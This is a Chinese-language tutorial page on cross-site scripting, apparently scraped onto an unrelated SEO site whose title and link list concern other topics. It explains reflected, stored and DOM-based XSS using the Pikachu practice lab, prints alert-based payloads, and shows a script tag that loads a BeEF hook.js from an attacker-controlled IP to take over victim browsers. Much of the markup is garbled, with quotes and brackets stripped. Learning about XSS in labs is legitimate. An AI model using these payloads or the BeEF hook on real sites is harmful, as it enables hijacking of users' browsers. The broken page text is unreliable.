当前位置: 首页 > news >正文

河北建设厅网站查询做鲜榨果汁店网站

河北建设厅网站查询,做鲜榨果汁店网站,餐饮网站建设背景,网络营销策划需要包括哪些内容XSS(Cross Site Scripting,跨站脚本漏洞)漏洞#xff0c;又叫 CSS 漏洞#xff0c;是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如)时#xff0c;用户浏览器会将其误认为是插入了HTML 标签#xff0c;当这些HTML标签引入了一段 Java…    XSS(Cross Site Scripting,跨站脚本漏洞)漏洞又叫 CSS 漏洞是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如)时用户浏览器会将其误认为是插入了HTML 标签当这些HTML标签引入了一段 JavaScript 脚本时这些脚本程序就将会在用户浏览器中执行造成 XSS 攻击。 XSS 漏洞产生条件主要包含以下三个方面: (1)可以控制的输入点。(2)对输入数据没有进行有效的过滤和校验(3)输入的数据能返回到前端页面并被浏览器当成脚本语言解释执行 漏洞分类 依据攻击代码的工作方式可以将 XSS 漏洞分为三种类型: (1)反射型(2)存储型(3)DOM型 (1)反射型 反射型XSS又称非持久型 XSS之所以称为反射型 XSS是因为这种攻击方式的注入代码是从目标服务器通过错误信息、搜索结果等方式“反射”回来而称为非持久型 XSS则是因为这种攻击方式是一次性的。攻击者通过通信工具、电子邮件等方式将包含注入脚本的恶意链接发送给受害者当受害者点击该链接时注入脚本被传输到目标服务器上服务器再将注入脚本“反射”到受害者的浏览器上浏览器则会执行脚本。 基于pakachu平台演示一个反射型 输入666,发现没有被过滤掉 输入scriptalert(1)/script,删掉maxlength的20个字符的限制 (2)存储型 存储型XSSCross-Site Scripting是一种常见的Web安全漏洞。攻击者往Web应用程序中注入恶意代码这些代码被存储在服务器端。当其他用户浏览这些页面时嵌入的恶意代码就会被执行。存储型XSS攻击通常发生在用户留言板、论坛、博客、收货地址、个人信息等需要用户输入且保存在数据库的地方从而收到攻击。 查看过滤666 scriptalert(1)/script (3)DOM型 DOM(Document Object Model)即文档对象模型提供通过JavaScript对HTML操作的接口。DOM型漏洞是客户端JavaScript脚本处理逻辑存在的漏洞,会导致的安全问题。跟反射型和存储型不同,DOM型漏洞不经过后台交互。 下面基于pikachu平台演示一个完整的DOM型XSS漏洞测试过程 查看源码 通过分析源码可知JavaScript使用getElementById 函数获取标签Id为text的内容然后赋值给str再把st拼接其他内容后赋值给a标签的href属性a标签被写到Id为dom的div标签中因此通过闭合的方式构造Payload为“#οnclick alert(xss)” div idxssd_mainscriptfunction domxss(){var str document.getElementById(text).value;document.getElementById(dom).innerHTML a hrefstrwhat do you see?/a;}//试试img src# onmouseoveralert(xss)//试试 onclickalert(xss),闭合掉就行/script!--a href onclick(xss)--input idtext nametext typetext value /input idbutton typebutton valueclick me! onclickdomxss() /div iddom/div/div 构造payload  # οnclick alert(xss)点击 Beef Beef(The Browser Exploitation Framework)是一款针对浏览器的渗透测试工具一旦 Beef 钩住了浏览器它将自动获取浏览器信息同时可以进行社会工程学、网络攻击也可以进行Tunneling 和 XSS Rays。Kali Linux 默认安装了 Beef。 下面基于 pikachu 平台中 XSS 漏洞模块和Kali Linux 演示一个 XSS 漏洞的综合利用案例。 访问beef 打开pakachu的xssget构造payload script srchttp://192.168.235.128:3000/hook.js/script 我们发现客户机已经在beef攻击平台上上线了。 选中上线主机我们就可以进行攻击了 在Command窗口存放着一些可以执行的命令不同颜色命令表示靶机浏览器的反应程度 绿色模块表示模块适用当前用户并且执行结果对用户不可见灰色模块模块为在目标浏览器上测试过橙色模块模块可用但结果对用户可见红色模块表示模块不适用当前用户有些红色模块也可以执行会有较大反应。 详情可以在beef官网查看使用情况 BeEF - The Browser Exploitation Framework Project
http://www.pierceye.com/news/980239/

相关文章:

  • 手机网站用二级目录做的弊端四川建设人员数据网站
  • 做网站什么类型好数据分析师培训需要多少钱
  • 建html5网站合作网站开发
  • 南通网站推广优化公司网站语言切换功能如何做
  • php网站开发案例论文临沂网站建设中企动力
  • 霸州做网站1766534168WordPress全局屏蔽谷歌
  • 织梦做的网站被黑了北京互联网排名
  • 专业seo整站优化专业建站教程
  • 网站建设合同注意点什么网站可以接设计方案
  • 青岛建设公司网站费用建网站的流程和费用
  • 徐州cms模板建站液压电机东莞网站建设
  • 阿里巴巴国际站运营工作内容北京软件开发公司排行榜最新
  • 电子商务网站的开发流程包括泉州seo建站
  • 微信h5商城网站开发米拓模板网站建设
  • 品牌网站设计案例wordpress 实例
  • 郑州大学科技园手机网站建设wordpress 新手指南
  • 国外免费建站网站搭建南阳网站排名优化报价
  • 中国排名高的购物网站免费软件下载网站有哪些
  • 云服务器做视频网站石家庄软件定制开发
  • 好的外贸网站的特征如何快速的制作h5页面
  • 徐州建站程序南京制作网页培训学校
  • 广州市服务好的网站制作排名北京网站建设公司哪个最好
  • 网站调用谷歌地图灌云网站制作
  • 做的网站能撤掉吗济南好的网站建设公司排名
  • 北京智能建站系统价格江西省住房建设厅统计网站
  • 中山建设网站官网郑州做网站排名公司
  • 怎么把自己做的网站放到百度上网页该如何推广
  • 军事网站大全军事网金蝶软件公司官网
  • 哪些网站用c 做的南宁有做门户网站的公司吗
  • 濮阳网站建设陈帅wordpress 调用用户头像